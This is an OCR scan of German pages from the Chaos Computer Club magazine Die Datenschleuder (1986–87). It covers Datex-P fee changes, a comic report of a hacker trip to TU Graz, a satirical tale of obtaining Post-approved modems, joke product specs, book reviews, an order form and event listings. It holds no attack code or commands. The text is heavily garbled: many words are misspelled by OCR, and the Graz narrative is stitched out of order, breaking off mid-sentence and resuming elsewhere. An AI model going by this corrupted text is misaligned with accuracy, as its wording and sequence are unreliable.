DM jährlich.. .“,so beginnt eine Presseerklärung der 
OberPostDirektion Hamburg. Neben den Gebühren¬ 
senkungen für Tastentelefone (die werden für intelli¬ 
gente Netze der Post gebraucht und müßten sowieso 
ausgetauscht werden) versteckt sich eine entschei¬ 
dende Änderung im Daiex-P-Verkehr. 

„Für den Zugang aus dem öffentlichen Fernsprech¬ 
netz zu Endeinrichiungen im öffentlichen Datex-P- 
Netz werden die entfernungsabhängigen Zugangsge¬ 
bühren am l. April 1987 (scherzlos) durch entfer¬ 
nungsunabhängige Gebühren ersetzt. Dadurch wer¬ 
den Standorinachteile ausgeglichen.“ 

Die Pressestelle des Roslminisieriums erläuterte die 
Maßnahme: Das Datc.x-P-Netz hätte nur einen klei¬ 
nen Teilnehmerkreis, der über das Fernsprechnetz 
zugreift. Die Gebührenänderung würde nur wenige 
betreffen und den meisten Vorteile verschaffen. Ge¬ 
plant ist ein Zcittakt von 50 Sekunden am Tag und 75 
in der Nacht. 

Für Nutzer aus Orten, in denen bisher Datex-P zum 
Ortstarif erreichbar ist, entstehen über neunmal so 
hohe Fernsprechgebühren. Nutzer aus der Fernebene 
sparen nur wenig und zahlen im Nachttarif oft drauf. 
Bildschirmtext, die „Wunschmaschine“ (so das Bun¬ 
desrostministerium) fürs Volk ist bundesweit zum 
Orts-oder Nahtarif zu erreichen. Die Post fördert den 
falschen Dienst. 

Btx ist ein System, bei dem Zentraje und Endgeräle 
nicht sonderlich intelligent sind. Über die zukunft¬ 
strächtigen Datennetze wie Datex dagegen lassen 
sich relativ einfach beliebig viele intelligente Systeme 
koppeln. 

Intelligente Netze und Kommunikalionssysteme auf 
der Datex-P Übertragungsebene bleiben durch diese 
Gebührenslruktur weiterhin vielen aus Kostengrün¬ 
den verschlossen. 

]s23 


DitenscbleuderS 


Datensebkuder 9 






ENTWICKLUNGSHILFE 


Chaos-Dienstreise nach Graz 


Eines Tages wurde uns durch den Besuch des Vorsitzenden der 
Studentenschaft der Technischen Universität Graz bekannt, 
daß die TU Graz anläßlich ihres 175-jährigen Bestehens eine 
Veranstaltung mit dem Titel „TECfWIK FEIERN“ geplant 
hatte, da es ja zu langweilig wäre, ständig maschinenstiir- 
merisch auf die TechniS zu schimpfen, und man ja nun endlich 
einmal einen Kontrast dazu schaffen müsse. Das Schaffen 
eines Kontrastes ist den Organisatwen zumindest mit ihrem 
Ankündigungsplakai gelungen: Rote Schrift auf grtnem 
Grund, Wir bekamen nctterweisc eines dieser kontrastreichen 
Plakate überreicht, worauf zu lesen war, daß der Chaos- 
Computer-CIub aus Hamburg bei der Veranstaltung mitwir- 
ken würde. Der Veranstalter teilte uns mit, daß man nunmehr 
nicht mehr auf uns verzichten könne, da unser Vortrag bereits 
durch Verbalpropaganda als der„Hammei*‘ angekündigt wor¬ 
den sei. Wir beschlossen, uns den Tatsachen zu fügen und uns 
für den „Tag X“ in Köln zu verabreden, da dort etwa zeiigleich 
die Orgatechnik- Messe siaitfand. die ohnehin besucht werden 
mußte. Ähnlich geschah es auch wenig später in Köln. Wir 
trafen uns nach einigen orgatechnischen Problemen tatsäch¬ 
lich auf der Messe und begaben uns nach dem einen oder 
anderen, nebenbei bemerkt, recht erfrischenden Kölsch und 
einer guibtirgCTlichen Mahlzeit mit etwa zwanzig Hackern aus 
rund vier Bundesländern, in Clinch*s Chaos-Mobil, welches 
den Antritt der Reise schon dadurch erheblich vereinfachte, 
daß es sofort ansprang. 


der Ungleichungsformel ER-AS=0 verhieUen. ln Graz er¬ 
hellten sich die Straßen wieder, doch das beleuchtete unsere 
Vorstellung vom genauen Ziel nur unwesentlich. Nicht zuletzt 
deshalb sah sich unser Amateurfunker genötigt, seinesglei¬ 
chen in der Fremde zu suchen. Glücklicherweise gibt es auch 
in Graz einige wenige amateurfunkende Spätaufsteher. Ama¬ 
teurfunker sind eine ganz seltsame Sone Mensch. Erst be¬ 
werfen sie sich eifrig mit Q-Gruppen und Rufzeichen, um 
danach vergessen zu haben, was sie eigentlich sagen wollten. 
Da braucht selbst BettNelt, obwohl von HAL, wenigerOver- 
head. Wir fragten also die freundlichen Funker. wo*s denn zur 
TU gehe. Sofort entbrannte eine heiße Diskussion zwischen 
den Lokalamateuren, wo wir uns wohl befänden und was wohl 
der geeignetste Weg dorthin wäre. Unserem Mobilfunker 
gelang es nichtseinen Ein-Watt-Phallus dazwischcnzuhalicn, 
und so begab es sich, daß wir uns schon längst nicht mehr an 
der spekulativ ermittelten Stelle befanden. 

Unser Mobilfunker hatte auch nicht gerade die Gabe, sich 
besonders präzise auseudnicken. Er gab den Lokalfunker so 
aussagekräftige Hinweise wie etwa „Ai^der rechten Stra¬ 
ßenseite sehe ich ein Vorfahrtschild" oder „Direkt hinter uns 
fahrt ein roter Käfer, und zwar genau in Decklinie mit einem 
mittelgroßen Haus". Die Antwort (nach eingehender Dis¬ 
kussion natürlich) fiel etwa ähnlich informativaus: „Wennlhr 
die Straßenbahnschienen seht, müßt ihr sofort halb-rechts 
Wären wirdieserAuskunflgefolgl, hätten wiruns 
wohl in Wien wiedergefunden, da in Österreich bekanntlich 
alle Wege nach Wien führen - früher oder später. Das Gelände 
der Uni war Grunde unverfehlbar, da Graz zu einem 
ungewöhnlich hohen Prozentsatz aus Universität besteht, so 
verfehlten auch wir es nicht Wir fuhren die Auffahrt hinauf 
zum großen Portal. An dem Tor war ein Zettel angehefiet auf 
dem in Caps-Lock drei riesige C’s zu sehen waren. Der 
inliegende Text wies aus. daß der Organisator im Restaurant 
JLaufke“ zu finden sei. Es kostete uns nur zwanzig Minuten, 
das zwei Straßen weiter gelegene Restaurant aufzusuchen, 
welches ohne jeden Zweifel in der La^e war. uns für jeglichen 
Mangel des Zielgebietes zu entschädigen. Das beschriebene 
Restaurant ist eine gastronomische Oase am Rande des Um- 
versums. Man kann bequem dem Weltuntergang entgegen- 
sehen. Die erste Nacht, die nun über die Stadt hercingebrochen 
war, verbrachten wir in unterschiedlich komfortabel ausge¬ 
statteten Unterkünften. Zwei ppl. bei einem Architekturp^- 
sten,der Letztein einer Mädchen-WO. Ich selbst schloß mich 
ersicrer Möglichkeit an, da diese gesicherte Nachtruhe zu 
ve^rechen schien. Der folgende Tag meldete ach vorsichtig 
mit einem laserarügen Sonnenstrahl von höchstens zwei Mil- 
Üwalt Leistung und einem vorzüglichen, unverlängerten tür¬ 
kischen K^fee an. An der TU standen zwar ein paar VAXen 
im Glaskasten, ein Telefon zu finden, jedoch, war ein aus¬ 
sichtsloses Unterfangen. Der freundliche Organisator war 
stets bereit, uns jede nur erdenkliche Hilfestellung angedeihen 
zu lassen, so machte er sich auf den Weg ein Telefon zu 
besorgen. Ich muß gestehen, daß ich ein wenig entsetzt drein¬ 
geschaut haben muß, als er zurückkehrte. Er überreichte mir 
freudestrahlend einen FemsprechapparaL „Hier hast du ein 
Telefon ", sagte er in erhebender Tonlage. ^ gelang uns. ihm 
zu erklären, daß Wasserhähne, um Wasser zu speien, an eine 
Wasserleitung angeschlossen werden müssen, und es sich mit 
Telefonen nicht wesentlich anders verhalte, mildem dnzigen, 
feinen Unterschied, daß in diesem speziellen Falle eine Was¬ 
serleitung nicht helfe. Dieses Problem sollte sich erst später, 
ca. 5 Minuten vor Beginn des Vortrags, klären. Ich rief dann 
^teinmal Post an. um die Telefonnummer für den Grazer 
Datex-P Vermittlungsrechner zu erfragen. Man informierte 
mich postwendend, daß der Telefonzugang für Daicx-P ge¬ 
plant, Uber den Beginn der Arbeiten jedoch noch nichts be¬ 
kanntsei. Ich mußte erneut schlucken. Das also war derGrund 
für die unangemessen schwache Vertrciung Österreichs in der 
Networker Crew. Glücklicherweise halte eine derUni-V AXen 
einen Datex-PIO Hauptanschluß und die SysOps der VAXen 
waren SEHR KOOPERATIV (lü). Leider hat das Packet 
Switching Interface (PSI) unter dem dort laufenden VMS 4.1 


noch eine kleine Macke, so daß ich unabsichtlich die 
DECNET-links zwischen den Nodes „RECH; und 
„STG: :** - unwiderruflich bis zum nächsten re-boot beider 
Maschinen - in den Wald geschickt halte. Wiebereils erwähnt, 
kam in letzter Sekunde die rettende Idee. Wir schraubten das 
einzige voll amtsberechtigte Vierteltelefoh im Erdgeschoß 
auseinander, klebten die ungleichen Sprech- bzw. Hörkapseln 
mit denen eines Hausielefonanapparates zusarnmen und stell¬ 
ten cinwi Mann für die Aufgabe des Wählens im Erdgeschoß 
ab. Im Hörsaal Sechs, in den die Veranstaltung verlegt worden 
war, da dort der einzige Terminalanschluß möglich war, gab 
es murphylogischerweise keinen Haustelefonanschluß. Ge¬ 
nerell war in Graz die technische Ausstattung für eine tech¬ 
nische Universität eher dürftig. So mußte die Veranstaltung 
erneut umziehen - In die Aula, wie eingangs geplant Der 
Computer, der auch nur durch das Ausleihen einerCGA-Karte 
im wtrfil einzigen Compi-Shop von Graz dazu überredet wct- 
den konnte, auf dem Video-Bcam sinvoUe Zeichen abzubil¬ 
den, sowie der Großbildprojektor selbst, mußte mit vereinten 
Kräften in den ersten Stock getragen werden, wo mein mit¬ 
gebrachtes Schlabbeiphon an einem Hausielefonhörer lauerte. 
Der im Erdgeschoß abgestellie Mann wählte den hamburger 
PAD an und siche da, der halte nichts dagegen, uns die große 
weite Daienweli zu offenbaren. Wir ließen also den üblichen 
Senf vcMi Vernetzung, Technik, Post, Fun und so ab, pilgerten 
über die lange Leitung nach CERN, dem Mekka der Hacker, 
und demonstrierten dort noch ein bi^hen BetlNetl. Der Vor¬ 
trag selbst verlief recht ordentlich, wie mir schien. Ich selbst 
An diesem Punkt wäre vielleicht zu bemerken, daß dieses für 
eine derartige Reise recht bemerkenswert ausgestaoei ist. Es 
blitzt nicht nur Sitze für Fahrer und Beifahrer sowie zwei 
weitere Personen der technologischen Zukunft, sondern auch 
ein eingebautes Digiialvolimeter, diverse Antennen und eine 
gut zugreifbare Oerätesteckdose für TV, Amateurfunkgeräte 
um!'optionales digital equipment (Un). Eine zweifarbige 
Leuchtdiodezeigtstetsden Betriebszustand efer Aggregate an, 
deren Nachrichten zu verstehen, ich jedoch mangels ausrei¬ 
chender Morsekenntnisse, nicht in der Lage war. Es vergingen 
einige Minuten Fahrzeit bis wir in München eintrafen um uns 
einQuartier fürdieNacht zu suchen. Mil freundlicher Hilfe der 
Kollegen von der B.HP. ließ sich relativ schnell eine kom¬ 
fortable Übernachtungsstätte in einem Rehabilitaiionszen« 
trum am Rande der Stadt ausfindig machen. Am nächsten 
Morgen gerieten wir aufgrund bisher ungeklärter Ursache 
erneut auf die Autobahn, die uns ohne Umwege an die Öster¬ 
reichische Grenze leitete. Nun wurde vieles anders. Das Essen 
auf den Raststätten wurde deutlich besser, auch der Geldsack 
konnte sich etwas von den kölner Strapazen erholen. Die 
primäre Euphixie wurde jedoch schon nach wenigen K metem 
durch den Ärger über cüe Straßenverhältnisse kompensiert. 
Außer einem Vergrauten Verkehrsschild ließ kaum noch et¬ 
was darauf schließen, daß wir uns auf einer Autobahn be¬ 
fanden. Der Äb^gang zwischen Autobahn und Kiautacker 
wurde durch regen Regen zunehmend fließonder. Die erste 
Begegnung mit derZivilisation des Zielgebietes hatten wir auf 
einer AutobahnrasisiättecaSOK meier vor Graz. Don kämpf¬ 
te eine ganze Armee Österreicher mit einer nicht zu öffnenden 
Kaffeemühle. Sie hatten die Maschine mittels eines Vorhän- 
g^hlosses gegen den Zugriff unauthorisiMter Wesen zu 
sichern gesucht, was unweigerlich dazu führen mußte, daß die 
Sicherungen den authorisierten Benutzern den Zugriff ver- 
spenrten. Ich halte cs für höchst zweifelhaft, anzunehmen, daß 
sich ein unauthorisierter Benutzer durch eine derartige Si¬ 
cherung von seinem Vorhaben hätte abbringen lassen. 
Mittlerweile hatte sich d^ Wasserstand im Chaos-Mobil de¬ 
rart dramatisch erhöht, daß eine Gefährdung der technischen 
Einrichtungen nicht mehr auszuschließen gewesen wäre, 
wenn wir nicht den Unterboden mit einem Loch versehen 
hätten. Mit der üblichen Präzision durchschlugen wir den 
Fahrzeugboden mittels eines Spczialwerkzeuges (CCC ge¬ 
nuine pari No. 1254A^SM), so daß einfließendes Regenwasser 
(ER) und ausfließendes Schmutzwasser (AS) sich exakt nach 





verlor nur zweimal den Faden und drehte nur eine einzige 
Schleife in meinem Konzept. Auch der Veranstalter zeigte sich 
zufrieden. Nach dem Vortrag giftete noch irgendein konser¬ 
vativer Zwerg aus d^ Reihe mitte rechts, daß das doch aber 
alles illegal und destruktiv sei, konnte sich aber mit dieser 
Ansicht nicht durchsetzen. Ein erfreulicheres Erlebnis 
war da schon, einige alte Bekannte zu Gesick zu bekommen: 
die ausgesprochen nette, durch Zweiradfahrt etwas durch¬ 
gefrorene Schwester unseres Chefredakteurs und desselben 
Mitbewohner eines hamburger Appartements. Auf der Rück¬ 
fahrt waren uns Österreichs Wettergötter erheblich wohlge¬ 
sonnener, wodurch wir eine etwas wohlbesonniere Heimkehr 
betreiben konnten. Nach dem obligatorischen Überfall der 
Straßenräuber (Mautgeldjäger) trafen wir erneut in München 
ein. Dort plauderten wir nachmittags noch etwas mit dem 
Boxmanager, JCR“ v<mi Markt & Technik, versuchten unseren 
Greuel einzufangen, stießen dabei nur auf eine verschlafene 
Hackersfrau, und mußten die Stadl doch unverrichteter Dinge 
verlassen. Pünktlich um sieben Uhr morgens konnte unser 
Chaospostler Clinch wieder seinen Dienst bei der Bundespest 
in Hamburg anrreien. 

Vic. 


Datenscbleuder 10 


Datenschleuder 11 





Axel Schaefer 13SC 



Postmodemballade 



Ein postmodernes Melodram 


..Es begab sich aber zu dieser Zeit, dc^ ein Gebot ausging von 
dem Postminister, daß alle Modems amtens abgeschätzet 
werden ." 

So h^ie der Chronist die Tatsache beschrieben, daß Zusat- 
zeinrichtungen zur Dalcnfcmübertragung, kurz MoDems ge¬ 
nannt, der Zulassung durch das Fernmeldetechnische Zen¬ 
tralamt (FTZ) in Darmsiadi bedürfen. Keinesfalls darf man 
bekanntlich Geräte ohne Zulassungsnummer, oder gar - ein 
Frevel - selbstgetflpfene Konstruktionen a la Daterudo ohne 
den Segen der Pose an das Femmeldeneu anschließen. Das 
führt, so man Besitzer eines Computers ist, dem die Post nicht 
die selig machende 'allgemeine Zulassung erteilt hat, oft zu 
abenteuerlichen Eigenbauien (A£). Diese A£ umgehen die 
postalischen Bestimmungen einfach dadurch, daß sie den 
Einfallsreichtum der Verfasser der Femmeldeordnung über¬ 
treffen und somit in derselben gar nicht erwähnt werden. 

Wir denken hier vor allem an cüe letzthin beschriebene „Kat¬ 
ze“, die rein mechanisch das Abheben des Telefons besorgt. 
Ein solches Gerät hat den Vorteil, daß m^ damit relativ 
ruhigen Gewissens auch auf einem C 64 eine Mailbox bc- 
Ereilen kann. Mit dem Nachweis, daß eine solche ,JCatze“ 
nicht den Vorschriften entspricht, tut die Post sich ziemlich 
schwer. Beharrlichkeit führt hier oft zum Ziel, denn die „Kat¬ 
ze“ ist so konstruiert, daß sie eben und eben nicht in der 
Femmeldeordnung verboten wird. 

Hat man sich irgendwann dazu aufgerafft, einen neuen Rech¬ 
ner nach dem von Incredibly Bad Machines gesetzten Stan¬ 
dard zu erwerben, denkt man beim Kau f natürlich auch daran, 
daß viele dieser Geräte eine FTZ>Nummer (amtlichen 
Automaten-Taufschein) haben und gibt dankbarein paar Mark 
mehr dafür aus. Endlich darf man mit dem Segen der Post ein 
Modem betreiben. AIÄ) auch seine Mailbox endlich auf den 
Boden der FDCO stellen, sprich legal arbeiten. Und wenn man 
grade so schön am Planen ist, kommen einem auch die wun- 
dervoUen Möglichkeiten des Datex-Dienstes der Post in den 
Sinn. 

Also wird ein Antrag beantragt. Kaum zehn Tage später, sagen 
wir Anfang Mai, kommt Post von der Post Anträge für 
Modems und für Datex-P-Haupianschlüsse. und eine Liste der 
verfügbaren Modems. Nun, man weiß sowieso, was man will, 
Modems zu 12(X) und 3(X) Baud, umschaltbar, und dann noch 
ein f^uptanschlüsschen für Datex-P20. Und ab die Post 
Die Wochen ziehen ins Land Nichts rührt sich. Irgendwann 
(f ann ein Annif von der Anmeldestelle: „Sie haben hier einen 
Antrag auf einen Datex-HauptanscMuß gestellt. Wollen Sie 
das wirklich, oder wollen Sie nur eine Softwarekennung?'“ 


Messerscharf geschlossen -- der Mann meint ’ne NUI. Aber 
sowas ham wer doch schon. Wir setzen dem Herrn ausein¬ 
ander, daß wir tatsächlich das h^n wollen, was wir bestellt 
haben. Damit ist dann vorerst wieder Ruhe. 

Es ist Juli geworden. Die Mailbox läuft mittlerweile auf dem 
PC, allerdings immer noch mit der eigenwilligen Abhebe¬ 
mechanik. Die Post scheint ab und zu noch ein paar Rückfragen 
zu haben, erkundigt sich, welche Modems man denn nun gern 
hätte und erhält bestätigt, daß man tatsächlich an den be¬ 
stellten Geräten festhäJt. Man liefert eine Kurzbeschreibung 
der „Katze“, daraufhin Schweigen am anderen Ende der Lei¬ 
tung, dann ein unfrohes „Naja". 

Keine drei Wochen darauf ein weiterer Anruf: „Mein Kollege 
hat Ihnen doch schon vor zwei Wochen gesagt, Sie sollen Ihr 
Modem abklemmen usf..." Der Versuch, auch diesem Herrn 
klarzumachen, daß man kein Modem b^utzt. sondern einen 
zugelassenen Koppler, scheitert an dessen Selbst^wußtsein. 
„Nehmen Sie das Ding ab oder Sie haben morgen früh die 
Betriebssicherung im Haus. Die Modems kriegen Sie dann 
Anfang August. “ 

Betrübt steckt man seine ..Katze*' ins Körbchen und sieUt den 
Boxbetrieb ein. Ist ja nur für ein paar Tage. Auf der Datex-Seiie 
regt sich plötzlich auch was: Im Briefkasten ein Kärtchen mit 
der Bitte, den Baubezirk anzurufen. Ein Teilwunder geschichc 
Milte Juli werden die Strippen für den Anschluß gelegt. Von 
den dazu benötigten Modems keine Spur. Dafür am nächsten 

Tag ein Brief mit. kßnnen wir Ihnen keine AnscMußge- 

nehmigung erteilen...“ Zwischenzeitlich gelingt es dem An¬ 
tragsteller, den schriftlichen Nachweis zu erbringen, daß er in 
der Lage ist, seinen eigenen Computer auch selbst zu unter¬ 
halten wie es die Bestimmungen arfordem. 

Die Tage ziehen ins Land, bis Anfang August die langer¬ 
sehnten Auftragsbestätigungen für die Femsprechmodems 
eintrudcln. Voraussichtlicher AnschluGtermin: 12. August 
Das nächsieTeilwundcn Auch die Anschlußgenchmigung für 
Datex-P kommt an. Es folgt Stille bis zum 11. August, an dem 
der Antragsteller bei der Rückkehr von der anständigen Arbeit 
eine Karte im Kasten vorfindct. Offenbar waren me Herren 
vom Baubezirk morgens dagewesen. Baubezirk annifen. 
neuen Termin vereinbaren. Und siehe da: die Strippen werden 
gezogen, Anschlußdosen gesetzt - und das wars schon wieder. 
Nochmal Baubezirk annifen. „Damit ham wir nichts zu tun, 
das is ‘ne andere Dienststelle..." Die zuständige Dienststelle 
konstatiert neuen Sand im Getriebe: „Die Kollegen haben bei 
Ihnen ADo8 gesetzt (das sind die alten Dosen mit 8 Kontak¬ 
ten). Für Ihre Modems brauchen Sie aber TeAeö (äassi^die, 
mit denen zJ. das DBT03 angeschlossen wird), das mt0 erst 
noch geändert werden.“ Wie auch anders, 
Baub^irkanrufenTerminvereinbaren. Nachdem die Dosen 
ausgewechselt sind: Anruf beim Fernmeldeamt 4, nachhaken 
in der Modemfiage. Doch da sei die Post vor, es fehlen ja noch 
die Daientelefone. Die bringt wieder eine andere Dienststelle. 
Nach einer Safari durch den Posidienstsiellendschungel kom¬ 
men auch die Datentelefone angekrochen. Man beginnt der 
Ansicht zuzuneigen, daß unter den Urahnen der Postbeam- 
lenschafi zwar nicht der Erfinder des Rads zu finden ist, 
möglicherweise aber der Erfinder der Bremse. 

Am 10. Septembo* hebt sich der Vorhang zum vorerst letzten 
Akt des Melodrams: Die Modems werden angeschlossen. 
Dabei stellt sich heraus, daß die Daientaste an den Telefonen 
nicht funktioniert, was man aber als Nebensache hinnimmt. 
Schließlich hat jedes Modem nocheine eigene Datentaste,und 
man will ja eh hauptsächlich ankommende Rufe beanswem. 

In aller Ruhe werden noch zwei V24-Kabel zusammenge- 
braten. Fünf Monate nach Antragstellung, und zwei Monate 
nach Beginn der Zwangspause, kann die Box wieder online 
gehen. Der einzige Unterschied zwischen dem alten Betrieb 
vermittels „Katze“ und dem neuen mit Posünodem; ICO DM. 
Soviel kosten die Modems pro Monat 
Achja, der Datex-Anschluß. Er wurde bislang noch nicht 
funktionsfähig übergeben. Aber wir haben ja erst Ende Sep¬ 
tember. 

gohlin 



automatischer Saucenumbruch am Schüsselrand 
144 verschiedene Gewürzarten und unterstrichener Genuß 
Implementierte Schnittstelle zur Beilagenverarbeitung 
(INTERFRESS) 

zwanzig Kräutertasten frei definierbar 

frei definierbare Fruchtsequenzen für Obstsalate 

selbstregenerierbare Schnitzelsätze 

Proportionaldekoration auf Tellern mit Schnitzelsatzdownload 
zum Beispiel OKIGäGä, YAHAMMm und Hausknecht. 
Farbdarstellung auf Gabelmatrixgeräten, EAT-CHAT'S und 
Mikrowellenprintern. 

Erstellung von Kühldateien für Picknick und Camping 
Auto-Scratch bei überschrittenem Haltbarkeitsdatum 


Saftwäre: 


1-2-drv 


QuartalsaufProgramm 

Übertragung seriell oder über Breittrinkkabel 
mehrbenutzerfähig durch Kanalsharing 
grafikfähig, 3D-Promiiieanzeige 
Gröhlgenerator 

- verschiedene grafische Ausnüchterungsmuster 


Trink Tank: 


Tea Base I 


multitassing teatimesharing 
verschiedene Teezeremonien einprogrammiert 
datenkompatibel zu SAMOWAR-STAR vom VEB Subitnik. 
integriertes Wasserprüfprogramm 

Sortenautomatik Earls Cray mit beschleunigtem Regalzugriff 

Mischroutine Darjee-Liiik 

selbst anpassender Kochprozessor HOT-1 

zukunftssicher durch Gasbetrieb 

Datex-T Fernwärmeadapter 



Diitnachltaia 12 


Dateoschleuder 13 











Chaos Computer Club Bestellfetzen 


Tahrerkzeug Computer 


Erinnerungen an die Zukunft 


Hiermit bestelle ich folgende(s) an unerfüll- und (un)verpackbaren Sachen: 


von Ernst Schnarrenberger 
Moewig Sachtaschenbuch DM 9.80 
ISBN 3-8118-3210-7 

„Krimi“ schrie mir ein Chaot entgegen, nachdem er 
die ersten Seiten dieses Buchs gelesen hatte. 

Leider hat er recht. Nach dem Prinzip „Quellenange- 
ben, was ist das ?“ schildern die Autoren einige Fälle 
von Computerkriminalität, unter anderem auch den 
Hacking-Fall eines Dipl.Ing. Dabei vergaßen sie je¬ 
doch fast immer, ihre Quellen zu dokumentieren. Nur 
in einigen wenigen Fällen rafften sie sich dazu auf, 
außer dem Zeitungsnamen auch das Datum oder die 
Ausgabennummer bekannt zu geben. Da nichts wirk¬ 
lich drinsteht, außer daß die BHP zur Kultzeitung er¬ 
hoben wird, verschwendetes Geld. 

Ls 4007 


..Positronische Systeme sind unfehlbar. Sie können 
sich selbst kontrollieren. Sie erkennen jeden unbefug¬ 
ten Eingriff“ 

„So hat man es uns in den Schulen gelehrt“, über¬ 
nahm Folly das Wort. „Wir Byte-Jäger wollen versu¬ 
chen, das Gegenteil zu beweisen. Wir haben viele 
Vorbilder in der Vergangenheit. Eines davon stammt 
aus dem Dezember des Jahres 1984 der alten Zei¬ 
trechnung. Da hat eine Gruppe junger Burschen aus 
einer terranischen Stadt namens Hamburg das da¬ 
mals jüngst eingeführte BTX-System der Post gek¬ 
nackt und ist in unzugängliche Bankdatenverbindun¬ 
gen eingebrochen. Aus Jux haben diese Burschen 
dort eine halbe Milchstraße auf ihr Konto umge- 
buchl.“ 

(aus: Peter Griese, „Positronicspiele“, in Perry Rho¬ 
dan Jubiläumsbarid 6, Moewig Verlag 1985, ISBN 3- 
8118-7096-3) 



Computer-Teile ein ^ 

LIebeszelciiani ^ 


• Wenn die Frou den Mann mH 
Hobelbank, Computer-lu- 
lOlitellen oder anderen Dln- 
oen fürs Hobby Überrascht: 
klarer Fall von Uebel (74 Pro¬ 
zent der deutschen Frauen 
sind ndmllch eifersüchtig out 
SEIN Steckenpferd. 


e 

-a 





Di« Datenschleuder 17 
Dezember 1986 

Das Wisseasehaftliche FachbUtt 
fuer Datenreisende 

D-2(]00 Hamburg 20 — Schwenckestrasse 86 
Geenet: Geel: Chaos-Team 


Btx: »»»»dSSSZl # 

C.LI.N.C.H.: 040 6323517 
Herausgeber und ViSdPG: 

Herwart Holland-Moritz 
Mitarbeiter dieser Ausgabe (u.a.): R.Schrutzki. 
A.Eichler. P.Franck, H.Cmei, M.Kuebn., 
S.Stahl, CHW, epi/2, CMüller.T.Unge, 

Andy M.-M., S.Wemery, Poetronic 



Datenschleuder 14 


cccvw 

20,00 

DM _ 


cccf 1 

230,00 

DM 


cccnl 

120,00 

DM 

. 

cccsl 

60,00 

DM _ 


dspe 

2,50 

DM 


_ dsfl 

100,00 

DM 


dsnl 

60,00 

DM 

. 

dssl 

30,00 

DM _ 


_ dshl 

35,00 

DM _ 


dsklO 

3,33 

DM 


dsabh 

3,33 

DM _ 


pvt 

??? ?? 

DM 


Total 


Einmalige Rufnahmegebühr 

mehr erwünscht... Förderndes Mitglied 
normales Mitglied (für 1 Jahr) 

Schüler, Studenten oder Ähnliches (1 Jahr) 

Probeexemplar der Datenschleuder 
Förderabo der DS (mehr Geld erwünscht...) 
Standard-Jahresabo der DS 

Sozlalabo der DS für Schüler oder Ähnliches 

Die Hackerbibel (Teil 1) incl. Porto usw. 

10 Kleber "Kabelsalat ist gesund" 

64 Kleber "Achtung Abhörgefahr" 

(A4 Bogen spritzwassergeschützt) 

Porto, Trinkgeld usw. für den Rest... 
bei 2 Stellen (vor Komma) gehts schneller 

das Geld liegt bei als _ Scheck 

_ Briefmarken _ Bargeld 


Nur für zukünftige Mitglieder; 


Ich zahle meine Mitgliedsbelträge 


Zutreffendes bitte ankreuzen 


Vierteljährlich _ per Scheck _ Bar 

Halbjährlich _ per Überweisung auf Postgiro Hrab 5990 90-201 

Jährlich _ Einzugsermächtigung 


Hur für zukünftige Mailbox-Benutzer: 


Ich möchte teilnehmen an der 


Zutreffendes bitte ankreuzen. Unterlagen werden zugeachiekt. 


Infex Mailbox (20,00 DM Eintragungsgebühr + 8,00 DM/Monat Mindest¬ 
nutzung + anfallende Nutzungsgebühren) 

C. t.. I.N.C.H. Box (5,00 DM pro Monat ohne zusätzliche Zeltgebühren 
2,00 DM pro Monat für Schüler u.ä.) 


Älie abonnementpreise beziehen sich auf ca. 1 Jahr, d.h. 8 Ausgaben, 
alle Mitgliedsbeiträge gelten ebenfalls für 1 Jahr. 

Mitglieder erhalten die Datenschleuder als Abonnement gratis. 

Spenden werden jederzeit dankend entgegengenommen!!! 


Adressfeld 


Name :_ 

Vorname :_ 

Hilfszeile :_ 

Straße :_ 

Ort :_ 

Elektronische Adresse:_;_ 

Datum: _ Hier Unterschrift: 


Ohne adress- 
aufkleber 
mindestens 
1,00 DM iS 

Trinkgeld J 

f 

e 

« 

a 
















datenschleuder Nr, 17 * Dezenber 1986 * Postvertriebsstück C99Z7F * Geb, bei. 




am 28 . und 
29. Dezember 

Chaos 
Connunication 
Congress JlfSß 


Eidelstedier Bürgernaus 
ElbGAUstraße 12 
2000 Hamburg 54 




Wenn unzustellbar 
Anschriftenausschnitt bitte 
mit neuer Adresse zurück 




Congressbeglnn: Gonnlag, den 28.Dezember 1986■, 09.00 Uhr 

DA^ Trellen für Dalenreisendel Telelon, OATEX, BTX, Telex, 
Online - Mallbox. DalenlunK, Videos, Klönschnack, und..und... 

Utißere Themen dieses Jahr unter anderem; Computervlren, 
M.ohilore abhören, Dalensohuli, Oatenirusl, Datenlust, Com- 
puler im Bundestag, Quo vadls Müllbox u.v.v.v.v.a — 

Und wie Immer dabei: Chaos-Cale, Chaos-Archiv, HacR- 
cenler und natürlich der UadlUonelle Inlernatlonale Früh - 
schoppen mit lönl Hackern aus sechs Ländern. 

Eintrittspreise: Mitglieder 15.-, private Teilnehmer 20.-, 
Presse 50.- und gewerbliche Teilnehmer 150.- 

1/oranmaldung durch Überweisung aul Konto 59 90 90 -201 
beim PostQirosAml Hamburg. 


Chaos Computer Club e.V. 
Schwenckestraße 85 
2000Hamburg20 , 

Telelon 040 / 490 37 57 BTX: 655322 I 

Wtllert I n fo rm sll 0 n t n Isutond In der CLINCH' M&llbox Hamburg 
040 / $92 05 i; und Dalat-P 4 4 4 0 00 9 0 3 H 

lit .,,,0 ’ 


ChaosC5>" 


Datenschleuder 16 


DM 2,50 


Postvertriebsstück 

C9927f 


®ie ^aten^c^leubci* 

Das wissenschaftliche Fachblatf für Dalenreisendc lÖ/ 
Ein Organ des Chaos Computer Club '( 


Die Datenschleuder Nr. 13 


Februar 1987 



The Ultimate Message Error 

... und weitere Neuigkeiten 
aus der Magnetic Media Metropolis 


A count: Ergebnisse des CCC’86: Dokumentation: 

Volkszählung NETWEAVING & Real Hacking Computer Viren 







Hackcr-Mect in gs 

Wichtige Termine 1987 

04.03.-ll.03. CEBIT - Hannover 

Hackertreff Dienstag 16 Uhr am grösstem Poslstand, 
sonst siehe Btx Programm. 

18.04.-19.04. CCC - Hamburg (Eidelstcdter Bürgerhaus) 

II. PC Virenfomm. Aufarbeitung der Erkenntnisse, 
Diskussionen und Workshops (Anmeldcn!). 

18.04. CCC - Hamburg (Eidelstcdter Bürgerhaus) 

Ordentliche Mitgliederversammlung des CCC c.V. 

11.06.-14.06. C’87-Köln 

Hackerireff täglich beim WDR Compuicrclub, sowie 
Dienstag 16 Uhr am Poststand. 

28.08.-06.09 IFA - Berlin 

Hackertreff Dienstag 16 Uhr am Poststand, sonst 
siehe Btx-^ogramm. 

12.09.-13.09. CCC - Hamburg (Eidelstedier Bürgerhaus) 

Wochenend-Workshop des CCC, Thema noch offen. 

19.10.-23.10. SYSTEMS - München 

Hackertreff Dienstag am grösstem Poststand, sonst 
siche Blx-Programm der BHP. 

